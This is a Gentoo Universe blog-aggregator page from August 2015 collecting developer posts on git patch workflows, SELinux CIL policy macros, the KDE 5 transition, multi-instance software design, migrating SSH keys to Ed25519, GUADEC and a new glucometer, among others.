
. Aaron W. Swenson
. Agostino Sarubbo
. Alec Warner
. Alex Alexander
. Alex Legler
. Alexey Shvetsov
. Alexis Ballier
. Alexys Jacob
. Amadeusz Żołnowski
. Andreas K. Hüttel
. Andreas Proschofsky
. Anthony Basile
. Arun Raghavan
. Bernard Cafarelli
. Bjarke Istrup Pedersen
. Brent Baude
. Brian Harring
. Christian Ruppert
. Chí-Thanh Christopher Nguyễn
. Daniel Gryniewicz
. David Abbott
. Denis Dupeyron
. Detlev Casanova
. Diego E. Pettenò
. Domen Kožar
. Donnie Berkholz
. Doug Goldstein
. Eray Aslan
. Fabio Erculiani
. Gentoo Haskell Herd
. Gentoo Monthly Newsletter
. Gentoo News
. Gilles Dartiguelongue
. Greg KH
. Hanno Böck
. Hans de Graaff
. Ian Whyman
. Ioannis Aslanidis
. Jan Kundrát
. Jason Donenfeld
. Jeffrey Gardner
. Jeremy Olexa
. Joachim Bartosik
. Johannes Huber
. Jonathan Callen
. Jorge Manuel B. S. Vicetto
. Joseph Jezak
. Kenneth Prugh
. Kristian Fiskerstrand
. Lance Albertson
. Liam McLoughlin
. LinuxCrazy Podcasts
. Luca Barbato
. Luis Francisco Araujo
. Mark Loeser
. Markos Chandras
. Mart Raudsepp
. Matt Turner
. Matthew Marlowe
. Matthew Thode
. Matti Bickel
. Michael Palimaka
. Michal Hrusecky
. Michał Górny
. Mike Doty
. Mike Gilbert
. Mike Pagano
. Nathan Zachary
. Ned Ludd
. Nirbheek Chauhan
. Pacho Ramos
. Patrick Kursawe
. Patrick Lauer
. Patrick McLean
. Pavlos Ratis
. Paweł Hajdan, Jr.
. Petteri Räty
. Piotr Jaroszyński
. Rafael Goncalves Martins
. Raúl Porcel
. Remi Cardona
. Richard Freeman
. Robin Johnson
. Ryan Hill
. Sean Amoss
. Sebastian Pipping
. Steev Klimaszewski
. Stratos Psomadakis
. Sune Kloppenborg Jeppesen
. Sven Vermeulen
. Sven Wegener
. Thomas Kahle
. Tiziano Müller
. Tobias Heinlein
. Tobias Klausmann
. Tom Wijsman
. Tomáš Chvátal
. Vikraman Choudhury
. Vlastimil Babka
. Zack Medico

Last updated:
September 01, 2015, 13:06 UTC

Views expressed in the content published here do not necessarily represent the views of Gentoo Linux or the Gentoo Foundation.

Bugs? Comments? Suggestions? Contact us!

Powered by:
Planet Venus

Welcome to Gentoo Universe, an aggregation of weblog articles on all topics written by Gentoo developers. For a more refined aggregation of Gentoo-related topics only, you might be interested in Planet Gentoo.

August 31, 2015
Sebastian Pipping a.k.a. sping (homepage, bugs)
Critical Mass Berlin: Closing the gaps (August 31, 2015, 22:52 UTC)


I have been participating in Critical Mass Berlin a few times now. Simplified, it’s a few hours riding a bike through the city with all street lights green by definition, except for the people riding at the head. It goes a few rounds at Siegessäule sometimes, and has gone through Tempelhofer Feld before. It’s a few hours of being free, of a new view on the city; it’s time with friends, if you bring or make some. There are some problems though. I have seen cyclists falling, pedestrians falling while trying to cross the street, both drunk and sober, cars driving into cyclists, drivers getting out and starting a fight until nearby police join in, a few insane cyclists riding down the wrong lane.

One event shifted my perspective last time: shit, I get why some are so pissed about it. It was my first time corking a street — the practice of blocking cars so they do not run into cyclists by accident. I was riding near the head at the time, heard someone shouting “corking!” as a call for help and found myself standing in front of a car. And so I stood there, four of us. I was lucky: the car people were a lot friendlier than what I had observed with others’ corkings before. The car I was blocking was delivering pizza. Maybe when blocked everyone is a doctor or delivering pizza or living close by, but I believe he actually was. There was no end of bikes in sight. When the end seemed in sight, it turned out not to be the end, and then again. There were gaps and gaps and gaps again. Why?! To me on the inside, it started to become embarrassing. I should have used a stop watch, to know if my perception tricked me — it seemed like an eternity. With more and more people joining Critical Mass, waiting gets longer, no fix for that. But why gaps, why? The motto even says “Die Masse bleibt zusammen”, the mass remains as one body. What’s so hard about it? If I was sitting in a car, waiting for a stream of racing bikes to let go of the road would make sense. But drops of cyclists going by as if they were out shopping — how are they supposed to sit still and silent through that? Does it have to be that big of a “fuck you” to them? Things could go a lot more smoothly. Maybe I get it wrong, maybe it is a “fuck cars” ride for most, but my perception so far was that it’s not: it’s people who like to ride their bikes, who like to have fun, rather than an aggressive statement. The presence of so many is a statement by itself. Maybe it is statement enough?

When you participate in Critical Mass next time, I ask you to close the gaps: lead by example, ask those around you to join in closing the gaps, and give it some speed. Without the wind in your face, you’re missing the best part.

Thank you!

August 29, 2015
Luca Barbato a.k.a. lu_zero (homepage, bugs)
Patches and Plaid (August 29, 2015, 12:33 UTC)

This is part of the better tools series.

Sometimes you should question the tools you are using and try to see if there is something better out there. Or build it yourself.

Juggling patches

It is quite common when interacting with people to send back and forth the changes to the shared codebase you are working on.

This post tries to analyze two commonly used models and explain why they can be improved and which are the good tools for it (existing or not).

The two models

The focus is on git, github-like web-mediated pull-requests and mailinglist-oriented workflows.

The tools in use are always:

  • a web browser
  • an editor
  • a shell
  • an email client

Some people might have all of these in one application in one way or another, making one of the two models already far more effective. Below I assume you do not have such a tightly integrated environment.

Pull requests

Github made it quite easy to propose patches in the form of ephemeral branches that can be reviewed and merged with a single click in your browser.

The patchset can be part of your master tree or a brand new branch pushed to your repository for this purpose: first you push your changes to github, then you go to your browser to send the Pull Request (also known as merge request or proposed changeset).

You can get email notification that a pull request is available and then move to your browser to review it.

You might have a continuous integration report out of it, and if you trust it you may skip fetching the changes and testing them locally.

If something does not work exactly as it should, you can notify the proponents; they get an email saying there are comments, and they have to go to the browser to see them in detail.

Then the changes have to be pushed to the right branch and github helpfully updates it.

Then the reviewer has to get back to the browser and check again.

Once that is done you have your main tree with lots of merge artifacts and possibly some fun time if you want to bisect the history.

Mailing-list mediated

The mailing-list mediated model is popular in part because Linux uses it and git provides tools for it out of the box.

Once you have a set of patches (say 5) you are happy with, you can simply issue

git send-email --compose -5 --to

And if you have a local mailer working that’s it.

If you do not, you end up having to configure one (e.g. configuring gmail with a specific access token, so you do not have to type the password all the time, is sort of easy).

The people on the mailing-list then receive your set in their mailboxes as-is, and they can use git am to test it locally (first saving the thread with their email client, then running git am over it) and push it to something like oracle if they like the set but aren’t completely sure it won’t break everything.
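Sketched as shell, the reviewer-side round trip could look like this (patches.mbox is just an example name for whatever your email client saved the thread as):

```shell
# Create a scratch branch and apply the set saved from the mailing list.
git checkout -b review-set master
git am --signoff patches.mbox   # one commit per patch, with your Signed-off-by
```

If a patch does not apply cleanly, git am --abort brings the tree back to a clean state.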

If they have comments they can just reply to the specific patch email (using the email Message-Id).

The proponent can then rework the set (maybe using git rebase -i) and send an update, adding some comments here and there.

git send-email --annotate -6 --to

Updates to specific patches or rework from other people can happen by just sending the patch back.

git send-email --annotate -1 --in-reply-to patch-msgid

Once the set is good, it can be applied to the tree, resulting in a purely linear history that makes going over it looking for regressions pretty easy.

Where to improve

Pull request based

The weak and the strong point of this method is its web-centricity.

It works quite nicely if you use webmail anyway: it is just a matter of switching from one tab to another to see exactly what’s going on and reply in detail.

Yet, if your browser isn’t your shell (and you didn’t configure custom actions to auto-fetch the pull requests) you still have lots of back and forth.

Having continuous integration hooks you can quickly configure is quite nice if the project already has a solid regression and code coverage harness, so the reviewer's burden of making sure the code doesn't break is lighter.

Sending a link to a pull request is easy.

Sadly, if the new code does not come with tests, or with tests you can trust, the whole point above is half moot: you have to do the whole fetch&test dance.
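The fetch&test dance can at least be scripted: github exposes every pull request as a read-only ref. A sketch, with a hypothetical pull request number 123 on a remote called origin:

```shell
# Fetch pull request #123 into a local branch and check it out for testing.
git fetch origin pull/123/head:pr-123
git checkout pr-123
# ...build it, run the test suite, poke at it...
```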

Reworking sets isn’t exactly perfect either; it makes it quite hard for a third party to provide input in the form of an alternate patch over a set:

  • you have to fetch the code being discussed
  • prepare a new pull request
  • reference it in your comment to the old one


  • the initial proponent has to fetch it
  • rebase his branch on it
  • update the pull request accordingly

and so on.

There are desktop tools trying to bridge web and shell, but right now they aren't an incredible improvement, and the churn during review can be higher on the other side.

Surely it is really HARD to forget an open pull request.

Mailing list based

The strong point of the approach is that you have fewer steps for the most common actions:

  • sending a set is a single command
  • fetching a set is two commands
  • doing a quick review does not require switching to another application: you just
    reply to the email you received.
  • sending an update or a different approach is always the same git send-email command

It is quite loose, so people can have various degrees of integration, but in general your experience as a reviewer is as good as your email client, and your experience as a proponent is as good as your sendmail configuration.

People with a basic email client might even have problems referring to patches by their Message-Id.

The weakest point of the method is the chance of missing a patch, leaving it either unreviewed or uncommitted after the review.

Ideal situation

My ideal solution would include:

  • Not many compulsory steps, sending a patch for a habitual contributor should take the least amount of time.

  • A pre-screening of patches, ideally making sure the new code has tests and it passes them on some testing environments.

  • Reviewing should take the least amount of time.

  • A means to track patches, making it easy to know whether a set is still pending review or has been committed.

Enter plaid

I enjoy the mailing-list approach more since it is much quicker for me: I have a decent email client (that could still improve) and I know how to configure my local smtp. If I want to contribute to a new project that uses this approach, it is just a matter of finding the email address and typing git send-email --annotate --to email; github gets unwieldy if I just want to send a couple of fixes.

That said, I do see that the mailing-list shortcomings are a limiting factor, and while I'm not much concerned about making the initial setup easier (since federico already has plans for it), I do want to stop losing patches and to get some of the nice and nifty features github has, without losing the speed in development I enjoy.

Plaid is my try at improving the situation; right now it is more or less just an easier-to-deploy patch tracker along the lines of patchwork, with a diverging focus.

It emphasizes the concepts of patch tags, to provide quick grouping, and patch series, to ease reviewing a set.

curl | git am -s

is all you need to get all the patches into your working tree.

Right now it works either as a stand-alone tracker (this test deploy is fed by fetching from the mailing-list archives) or as a mailbox hook (as patchwork does).

Coming soon

I plan to make it act as a postfix filter, so it injects into the email a useful link to the patch. It will also provide a means to send emails directly from it, so it can double as a nicer email client for those that are more web-centric and get annoyed because gmail and the like aren't good for the purpose.

More views, such as a per-submitter view and a search view, will appear as well.

Sven Vermeulen a.k.a. swift (homepage, bugs)
Doing away with interfaces (August 29, 2015, 09:30 UTC)

CIL is SELinux' Common Intermediate Language, which brings a whole new set of possibilities to policy development. I hardly know CIL but am (slowly) learning. Of course, the best way to learn is to try and do lots of things with it, but real-life work and time-to-market for now force me to stick with the M4-based refpolicy approach.

Still, I do try out some things here and there, and one of the things I wanted to look into was how CIL policies would deal with interfaces.

Recap on interfaces

With the M4 based reference policy, interfaces are M4 macros that expand into the standard SELinux rules. They are used by the reference policy to provide a way to isolate module-specific code and to have "public" calls.

Policy modules are not allowed (by convention) to use types or domains that are not defined by the same module. If they want to interact with other modules, they need to call the appropriate interface(s):

# module "ntp"
interface(`ntp_domtrans',`
  # domtrans: when executing an ntpd_exec_t binary, the resulting process
  #           runs in ntpd_t
  domtrans_pattern($1, ntpd_exec_t, ntpd_t)
')

# module "hal"
ntp_domtrans(hald_t)

In the above example, the purpose is to have hald_t be able to execute binaries labeled as ntpd_exec_t and have the resulting process run as the ntpd_t domain.

The following would not be allowed inside the hal module:

domtrans_pattern(hald_t, ntpd_exec_t, ntpd_t)

This would imply that hald_t, ntpd_exec_t and ntpd_t are all defined by the same module, which is not the case.

Interfaces in CIL

It seems that CIL will not use interface files. Perhaps some convention surrounding it will be created - to know this, we'll have to wait until a "cilrefpolicy" is created. However, functionally, this is no longer necessary.

Consider the myhttp_client_packet_t declaration from a previous post. In it, we wanted to allow mozilla_t to send and receive these packets. The example didn't use an interface-like construction for this, so let's see how this would be dealt with.

First, the module is slightly adjusted to create a macro called myhttp_sendrecv_client_packet:

(macro myhttp_sendrecv_client_packet ((type domain))
  (typeattributeset cil_gen_require domain)
  (allow domain myhttp_client_packet_t (packet (send recv)))
)

Another module would then call this:

(call myhttp_sendrecv_client_packet (mozilla_t))

That's it. When the policy modules are both loaded, then the mozilla_t domain is able to send and receive myhttp_client_packet_t labeled packets.

There's more: namespaces

But it doesn't end there. Whereas the reference policy had a single namespace for the interfaces, CIL is able to use namespaces. This allows for an almost object-like approach to policy development.

The above myhttp_client_packet_t definition could be written as follows:

(block myhttp
  ; MyHTTP client packet
  (type client_packet_t)
  (roletype object_r client_packet_t)
  (typeattributeset client_packet_type (client_packet_t))
  (typeattributeset packet_type (client_packet_t))

  (macro sendrecv_client_packet ((type domain))
    (typeattributeset cil_gen_require domain)
    (allow domain client_packet_t (packet (send recv)))
  )
)

The other module looks as follows:

(block mozilla
  (typeattributeset cil_gen_require mozilla_t)
  (call myhttp.sendrecv_client_packet (mozilla_t))
)

The result is similar, but not fully the same. The packet is no longer called myhttp_client_packet_t but myhttp.client_packet_t. In other words, a period (.) is used to separate the object name (myhttp) and the object/type (client_packet_t) as well as interface/macro (sendrecv_client_packet):

~$ sesearch -s mozilla_t -c packet -p send -Ad
  allow mozilla_t myhttp.client_packet_t : packet { send recv };

And it looks like namespace support goes even further than that, but I still need to learn more about it first.

Still, I find this a good evolution. With CIL, interfaces are no longer separate from the module definition: everything is inside the CIL file. I secretly hope that tools such as seinfo will support querying macros as well.

August 28, 2015
Michael Palimaka a.k.a. kensington (homepage, bugs)


For those that are not already aware, KDE’s release structure has evolved. The familiar all-in-one release of KDE SC 4 has been split into three distinct components, each with their own release cycles – KDE Frameworks 5, KDE Plasma 5, and KDE Applications 5.

This means there’s no such thing as KDE 5!

KDE Frameworks 5

KDE Frameworks 5 is a collection of libraries upon which Plasma and Applications are built. Each framework is distinct in terms of functionality, allowing consumers to depend on smaller individual libraries. This has driven adoption in other Qt-based projects such as LXQt as they no longer have to worry about “pulling in KDE”.

We ship the latest version of KDE Frameworks 5 in the main tree, and plan to target it for stabilisation shortly.

KDE Plasma 5

KDE Plasma 5 is the next generation of the Plasma desktop environment. While some might not consider it as mature as Plasma 4, it is in a good state for general use and is shipped as stable by a number of other distributions.

We ship the latest version of KDE Plasma 5 in the main tree, and would expect to target it for stabilisation within a few months.

KDE Applications 5

KDE Applications 5 consists of the remaining applications and supporting libraries. Porting is a gradual process, with each new major release containing more KF5-based and fewer KDE 4-based packages.

Unfortunately, current Applications releases are not entirely coherent – some packages have features that require unreleased dependencies, and some cannot be installed at the same time as others. This situation is expected to improve in future releases as porting efforts progress.

Because of this, it’s not possible to ship KDE Applications in its entirety. Rather, we are in the process of cherry-picking known-good packages into the main tree. We have not discussed any stabilisation plan yet.


As Frameworks are just libraries, they are automatically pulled in as required by consuming packages, and no user intervention is required.

To upgrade to Plasma 5, please follow the upgrade guide. Unfortunately it’s not possible to have both Plasma 4 and Plasma 5 installed at the same time, due to an upstream design decision.

Applications appear in the tree as a regular version bump, so will upgrade automatically.

Ongoing KDE 4 support

Plasma 4 has reached end-of-life upstream, and no further releases are expected. As per usual, we will keep it for a reasonable time before removing it completely.

As each Applications upgrade should be invisible, there’s less need to retain old versions. It is likely that the existing policy of removing old versions shortly after stabilisation will continue.

What is this 15.08.0 stuff, or, why is it upgrading to KDE 5?

As described above, Applications are now released separately from Plasma, following a calendar-based versioning scheme (15.08 corresponds to August 2015). This means that, regardless of whether they are KDE 4 or KF5-based, they will work correctly in both Plasma 4 and Plasma 5, or any other desktop environment.

It is the natural upgrade path, and there is no longer a “special relationship” between Plasma and Applications the way there was in KDE SC 4.


As always, feedback is appreciated – especially during major transitions like this. Sharing your experience will help improve it for the next person, and substantial improvements have already been made thanks to the contributions of early testers.

Feel free to file a bug, send a mail, or drop by #gentoo-kde for a chat any time. Thanks for flying Gentoo KDE!

August 27, 2015
Alexys Jacob a.k.a. ultrabug (homepage, bugs)
py3status v2.6 (August 27, 2015, 17:04 UTC)

Ok, I was a bit too hasty in my legacy module support code clean-up and broke quite a few things in the latest version 2.5 release, sorry! :(


  • make use of pkgutil to detect properly installed modules even when they are zipped in egg files (manual install)
  • add back legacy modules output support (tuple of position / response)
  • new uname module inspired by issue 117, thanks to @ndalliard
  • remove dead code

thanks !

  • @coelebs on IRC for reporting, testing and the good spirit :)
  • @ndalliard on github for the issue, debug and for inspiring the uname module
  • @Horgix for responding to issues faster than me !

August 25, 2015
Sven Vermeulen a.k.a. swift (homepage, bugs)
Slowly converting from GuideXML to HTML (August 25, 2015, 09:30 UTC)

Gentoo has removed its support for the older GuideXML format in favor of the Gentoo Wiki and a new content management system for the main site (or is it static pages? I don't have the faintest idea, to be honest). I still have a few GuideXML pages in my development space, which I am going to move to HTML pretty soon.

In order to do so, I make use of the guidexml2wiki stylesheet I developed. But instead of migrating it to wiki syntax, I want to end with HTML.

So what I do is first convert the file from GuideXML to MediaWiki with xsltproc.

Next, I use pandoc to convert this to restructured text. The idea is that the main pages on my devpage are now restructured-text based. I was hoping to use markdown, but the conversion from markdown to HTML was not what I hoped it would be.

The restructured text is then converted to HTML using rst2html (from docutils). In the end, I use the following function (for a one-time conversion):

# Convert GuideXML to RestructuredText and to HTML
gxml2html() {
  basefile=${1%%.xml};

  # Convert to Mediawiki syntax
  xsltproc ~/dev-cvs/gentoo/xml/htdocs/xsl/guidexml2wiki.xsl $1 > ${basefile}.mediawiki

  if [ -f ${basefile}.mediawiki ] ; then
    # Convert to restructured text
    pandoc -f mediawiki -t rst -s -S -o ${basefile}.rst ${basefile}.mediawiki;
  fi

  if [ -f ${basefile}.rst ] ; then
    # Convert to HTML; use your own stylesheet links (use full https URLs for this)
    rst2html.py --stylesheet=link-to-bootstrap.min.css,link-to-tyrian.min.css --link-stylesheet ${basefile}.rst ${basefile}.html
  fi
}

Is it perfect? No, but it works.

August 24, 2015
Sebastian Pipping a.k.a. sping (homepage, bugs)

It seems I forgot to forward this when it blew my mind the first time. If you still need a reason not to download binaries from http:// URLs, this is it:

The Case of the Modified Binaries

While SourceForge is another story, they are an example of a website offering binaries through plain http://. Oh my.

August 22, 2015
Sven Vermeulen a.k.a. swift (homepage, bugs)
Making the case for multi-instance support (August 22, 2015, 10:45 UTC)

With the high attention that technologies such as Docker, Rocket and the like are getting (I recommend looking at Bocker by Peter Wilmott as well ;-), I still find it important that technologies are well capable of supporting a multi-instance environment.

Being able to run multiple instances makes for great consolidation. The system can be optimized for the technology, access to the system limited to the admins of said technology while still providing isolation between instances. For some technologies, running on commodity hardware just doesn't cut it (not all software is written for such hardware platforms) and consolidation allows for reducing (hardware/licensing) costs.

Examples of multi-instance technologies

A first example that I'm pretty familiar with is multi-instance database deployments: Oracle DBs, SQL Servers, PostgreSQLs, etc. The consolidation of databases while still keeping multiple instances around (instead of consolidating into a single instance) is mainly for operational reasons (changes should not influence other databases/schemas) or technical reasons (different requirements in parameters, locales, etc.).

Other examples are web servers (for web hosting companies), which next to virtual host support (which is still part of a single instance) could benefit from multi-instance deployments for security reasons (vulnerabilities might be better contained that way) as well as performance tuning. The same goes for web application servers (such as Tomcat deployments).

But even other technologies like mail servers can benefit from multiple instance deployments. Postfix has a nice guide on multi-instance deployments and also covers some of the use cases for it.

Advantages of multi-instance setups

The primary objective that most organizations have when dealing with multiple instances is consolidation to reduce cost. Especially expensive, proprietary software which is CPU-licensed gains a lot from consolidation (and don't think a CPU is a CPU: each company has its own core weight table to get the most money out of its customers).

But beyond cost savings, using multi-instance deployments also provides for resource sharing. A high-end server can be used to host the multiple instances, with for instance SSD disks (or even flash cards), more memory, high-end CPUs, high-speed network connectivity and more. This improves performance considerably, because most multi-instance technologies don't need all resources continuously.

Another advantage, if properly designed, is that multi-instance capable software can often leverage multi-instance deployments for fast changes. A database might be easily patched (to remove vulnerabilities) by creating a second codebase deployment, patching that codebase, and then migrating the database from one instance to the other. Although this often still requires downtime, the downtime can be made considerably shorter, and rolling back such changes is very easy.

A last advantage that I see is security. Instances can be running as different runtime accounts, through different SELinux contexts, bound on different interfaces or chrooted into different locations. This is not an advantage compared to dedicated systems of course, but more an advantage compared to full consolidation (everything in a single instance).

Don't always focus on multi-instance setups though

Multiple instances isn't a silver bullet. Some technologies are generally much better when there is a single instance on a single operating system. Personally, I find that such technologies should know better. If they are really designed to be suboptimal in case of multi-instance deployments, then there is a design error.

But when the advantages of multiple instances do not exist (no license cost, hardware cost is low, etc.) then organizations might focus on single-instance deployments, because

  • multi-instance deployments might require more users to access the system (especially when it is multi-tenant)
  • operational activities might impact other instances (for instance updating kernel parameters for one instance requires a reboot which affects other instances)
  • the software might not be properly "multi-instance aware" and as such starts fighting for resources with its own sibling instances

Given that properly designed architectures are well capable of using virtualization (and in the future containerization) moving towards single-instance deployments becomes more and more interesting.

What should multi-instance software consider?

Software should, imo, always consider multi-instance deployments. Even when the administrator decides to stick with a single instance, all it takes is that the software ends up in a "single instance" setup (it is much easier to support multiple instances and deploy a single one than to support single instances and deploy multiple ones).

The first thing software should take into account is that it might (and will) run with different runtime accounts - service accounts if you wish. That means that the software should be well aware that file locations are separate, and that these locations will have different access control settings on them (if not just a different owner).

So instead of using /etc/foo as the mandatory location, consider supporting /etc/foo/instance1, /etc/foo/instance2 if full directories are needed, or just have /etc/foo1.conf and /etc/foo2.conf. I prefer the directory approach, because it makes management much easier. It then also makes sense that the log location is /var/log/foo/instance1, the data files are at /var/lib/foo/instance1, etc.

The second is that, if a service is network-facing (which most of them are), it must be able to either use multihomed systems easily (bind to different interfaces) or use different ports. The latter is a challenge I often come across with software: the way to configure the software to deal with multiple deployments and multiple ports is often a lengthy trial-and-error exercise.

What's so difficult about using a base port setting, and documenting how the other ports are derived from this base port? Neo4J needs 3 ports for its enterprise services (transactions, cluster management and online backup), but they all need to be explicitly configured if you want a multi-instance deployment. What if one could just set baseport = 5001, with the software automatically selecting 5002 and 5003 as the other ports (or 6001 and 7001)? If the software needs another port in the future, there is no need to update the configuration (assuming the administrator leaves sufficient room).
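As a sketch (with a made-up baseport setting, not actual Neo4J configuration), deriving the ports could be as simple as:

```shell
# Derive the three service ports from a single base port.
baseport=5001
transaction_port=$baseport
cluster_port=$((baseport + 1))
backup_port=$((baseport + 2))
echo "transactions=$transaction_port cluster=$cluster_port backup=$backup_port"
# prints: transactions=5001 cluster=5002 backup=5003
```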

Also consider the service scripts (/etc/init.d) or similar (depending on the init system used). Don't provide a single one which only deals with one instance. Instead, consider supporting symlinked service scripts which automatically obtain the right configuration from their name.

For instance, a service script called pgsql-inst1 which is a symlink to /etc/init.d/postgresql could then look for its configuration in /var/lib/postgresql/pgsql-inst1 (or /etc/postgresql/pgsql-inst1).
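A minimal sketch of such a symlink-aware script (the paths and names are illustrative, not from any actual init script):

```shell
#!/bin/sh
# Invoked via a symlink such as /etc/init.d/pgsql-inst1 -> /etc/init.d/postgresql;
# derive the instance name, and thus its configuration, from $0.
instance=$(basename "$0")               # e.g. pgsql-inst1
confdir="/etc/postgresql/${instance}"   # per-instance configuration
echo "would start instance '${instance}' with configuration in ${confdir}"
```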

Just like supporting .d directories, I consider multi-instance support an important non-functional requirement for software.

August 21, 2015
Arun Raghavan a.k.a. ford_prefect (homepage, bugs)
GUADEC 2015 (August 21, 2015, 06:21 UTC)

This one’s a bit late, for reasons that’ll be clear enough later in this post. I had the happy opportunity to go to GUADEC in Gothenburg this year (after missing the last two, unfortunately). It was a great, well-organised event, and I felt super-charged again, meeting all the people making GNOME better every day.

GUADEC picnic @ Gothenburg

I presented a status update of what we’ve been up to in the PulseAudio world in the past few years. Amazingly, all the videos are up already, so you can catch up with anything that you might have missed here.

We also had a meeting of PulseAudio developers, at which a number of interesting topics of discussion came up (I’ll try to summarise my notes in a separate post).

A bunch of other interesting discussions happened in the hallways, and I’ll write about that if my investigations take me some place interesting.

Now the downside — I ended up missing the BoF part of GUADEC, and all of the GStreamer hackfest in Montpellier after. As it happens, I contracted dengue and I’m still recovering from this. Fortunately it was the lesser (non-haemorrhagic) version without any complications, so now it’s just a matter of resting till I’ve recuperated completely.

Nevertheless, the first part of the trip was great, and I’d like to thank the GNOME Foundation for sponsoring my travel and stay, without which I would have missed out on all the GUADEC fun this year.

Sponsored by GNOME!

Sponsored by GNOME!

August 19, 2015
Sven Vermeulen a.k.a. swift (homepage, bugs)
Switching OpenSSH to ed25519 keys (August 19, 2015, 16:26 UTC)

With Mike's news item on OpenSSH's deprecation of the DSA algorithm for public key authentication, I started switching the few keys I still had using DSA to the suggested Ed25519 algorithm. Of course, I wouldn't be a security-interested party if I did not do some additional investigation into the DSA versus Ed25519 discussion.

The issue with DSA

You might find DSA a bit slower than RSA:

~$ openssl speed rsa1024 rsa2048 dsa1024 dsa2048
                  sign    verify    sign/s verify/s
rsa 1024 bits 0.000127s 0.000009s   7874.0 111147.6
rsa 2048 bits 0.000959s 0.000029s   1042.9  33956.0
                  sign    verify    sign/s verify/s
dsa 1024 bits 0.000098s 0.000103s  10213.9   9702.8
dsa 2048 bits 0.000293s 0.000339s   3407.9   2947.0

As you can see, RSA outperforms DSA in verification, while DSA outperforms RSA in signing. But as far as OpenSSH is concerned, this speed difference should not be noticeable on the vast majority of OpenSSH servers.

So no, it is not the speed, but the secure state of the DSS standard.

The OpenSSH developers find that ssh-dss (DSA) is too weak, a position shared by various sources. Considering the impact of these keys, it is important that they follow state-of-the-art cryptographic practices.

Instead, they suggest switching to elliptic curve cryptography based algorithms, with Ed25519 and Curve25519 coming out on top.

Switch to RSA or ED25519?

Given that RSA is still considered very secure, one of the questions is of course whether Ed25519 is the right choice here or not. I don't consider myself an expert in cryptography, but I do like to validate claims through academic and (hopefully) reputable sources of information (not that I don't trust the OpenSSH and OpenSSL folks, but more from a broader interest in the subject).

Ed25519 should be written fully as Ed25519-SHA-512 and is a signature algorithm. It uses elliptic curve cryptography as explained on the EdDSA wikipedia page. An often cited paper is Fast and compact elliptic-curve cryptography by Mike Hamburg, which talks about the performance improvements, but the main paper is called High-speed high-security signatures which introduces the Ed25519 implementation.

Of the references I was able to (quickly) go through (not all papers are publicly reachable) none showed any concerns about the secure state of the algorithm.

The (simple) process of switching

Switching to Ed25519 is simple. First, generate the (new) SSH key (below just an example run):

~$ ssh-keygen -t ed25519
Generating public/private ed25519 key pair.
Enter file in which to save the key (/home/testuser/.ssh/id_ed25519): 
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /home/testuser/.ssh/id_ed25519.
Your public key has been saved in /home/testuser/.ssh/
The key fingerprint is:
SHA256:RDaEw3tNAKBGMJ2S4wmN+6P3yDYIE+v90Hfzz/0r73M testuser@testserver
The key's randomart image is:
+--[ED25519 256]--+
|o*...o.+*.       |
|*o+.  +o ..      |
|o++    o.o       |
|o+    ... .      |
| +     .S        |
|+ o .            |
|o+.o . . o       |
|oo+o. . . o ....E|
| oooo.     ..o+=*|

Then, make sure that the ~/.ssh/authorized_keys file contains the public key (as generated above). Don't remove the other keys yet until the communication is validated. For me, all I had to do was update the file in the Salt repository and have the master push the changes to all nodes (starting with non-production first of course).

Next, try to log on to the system using the Ed25519 key:

~$ ssh -i ~/.ssh/id_ed25519 testuser@testserver

Make sure that your SSH agent is not running, as it might otherwise fall back to another key if the Ed25519 one does not work. You can validate that the connection used Ed25519 through the auth.log file:

~$ sudo tail -f auth.log
Aug 17 21:20:48 localhost sshd[13962]: Accepted publickey for root from \ port 43152 ssh2: ED25519 SHA256:-------redacted----------------

If this communication succeeds, then you can remove the old key from the ~/.ssh/authorized_keys files.

On the client level, you might want to hide ~/.ssh/id_dsa from the SSH agent:

# Obsolete - keychain ~/.ssh/id_dsa
keychain ~/.ssh/id_ed25519

If a server update was forgotten, the authentication will fail and, depending on the configuration, either fall back to regular authentication or fail immediately. This gives you a nice heads-up to update the server, while keeping the old key handy just in case: simply refer to the old id_dsa key during authentication and fix up the server.

August 18, 2015
Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)
New glucometer: LifeScan OneTouch Verio (August 18, 2015, 23:16 UTC)

I have visited LifeScan's website and noticed that their homepage is suggesting that people with glucometers of the OneTouch Ultra series upgrade to a new series. The reason for the change is purported to be found in new regulations on quality and precision of glucometers, but I could not find any reference for it.

As usual, this is a free upgrade – glucometer manufacturers are generally happy to send you a free meter, since they make most of the money on the testing strips instead – so I ordered one, and I received it (or rather picked it up) this Monday. It's a OneTouch Verio.

The first impression is that it's a very bad match for my previous Ultra Mini: it's big and clunky. The whole case is about twice as big in volume. For me, as I travel a lot, this is a bit of a problem.

On the bright side, this is the first meter that I own that is not powered by CR2032 button cells. This model uses AAA batteries, which not only are much simpler to source, but are already always present in my luggage, as my noise-cancelling headphones use the same. I also bought a 40-pack of them last time I was at Fry's.

Also, while the upgrade from OneTouch Ultra 2 to Ultra Mini maintained the same set of testing strips, the Verio comes with a new strip type. This puts it into the same bucket as the Abbott Precision Xtra in my perception, which also requires a different set of testing strips. The reason why I consider those the same is that they both have "costs" associated with the change in strips. In particular since I already have two meters (actually, three if I count the one that is set to Italian readings), which means I can keep one at home and one at the office.

Similarly to the Abbott device, and unlike the Ultras, the new strips are not coded — it makes sense since the Ultra strips also have had the same code – 25 – for the past four years. This is good because at least once every two weeks I have to draw a second sample of blood because I put the first one too soon, before the meter accepted the code. These strips also require less blood than the old ones, and even less than the Abbott strips. Funnily enough, I never got in Europe the "new" Ultra strips I've used in the USA before, which require about half the blood as the standard European strips. Go figure.

Also, the most obvious difference in these strips is that they load blood on the side rather than the tip. I'm not sure why, but I like it — it feels like it's less likely to get ruined when you shake the strip bottle.

New meter also means new protocols of course. Unfortunately, LifeScan has already refused to send me the protocol of this device, which once again puts it into the same category as Abbott's. Interestingly enough, unlike both Abbott and the old Ultras, this device has a standard microUSB connection. Unfortunately by default it shows up as a mass-storage device with exactly one file in it: a redirect to the LifeScan website. I assume the software (which I have not installed yet) will modeswitch it to serial somehow and then proceed from there. If I had enough time I'd be setting up my Windows laptop for logging USB traffic and try to reverse engineer both this and Abbott's protocol.

Funnily enough there is another meter, called OneTouch Verio Flex, only available in Ireland, which has bluetooth connectivity. Whereas there's the Verio Sync in the USA, which syncs with an iPhone app (no Android app, though.) I wonder if I should call them up and see if I can get myself one of those as well; it uses the same strips and would solve my problem of having more than one meter using the same stash of strips.

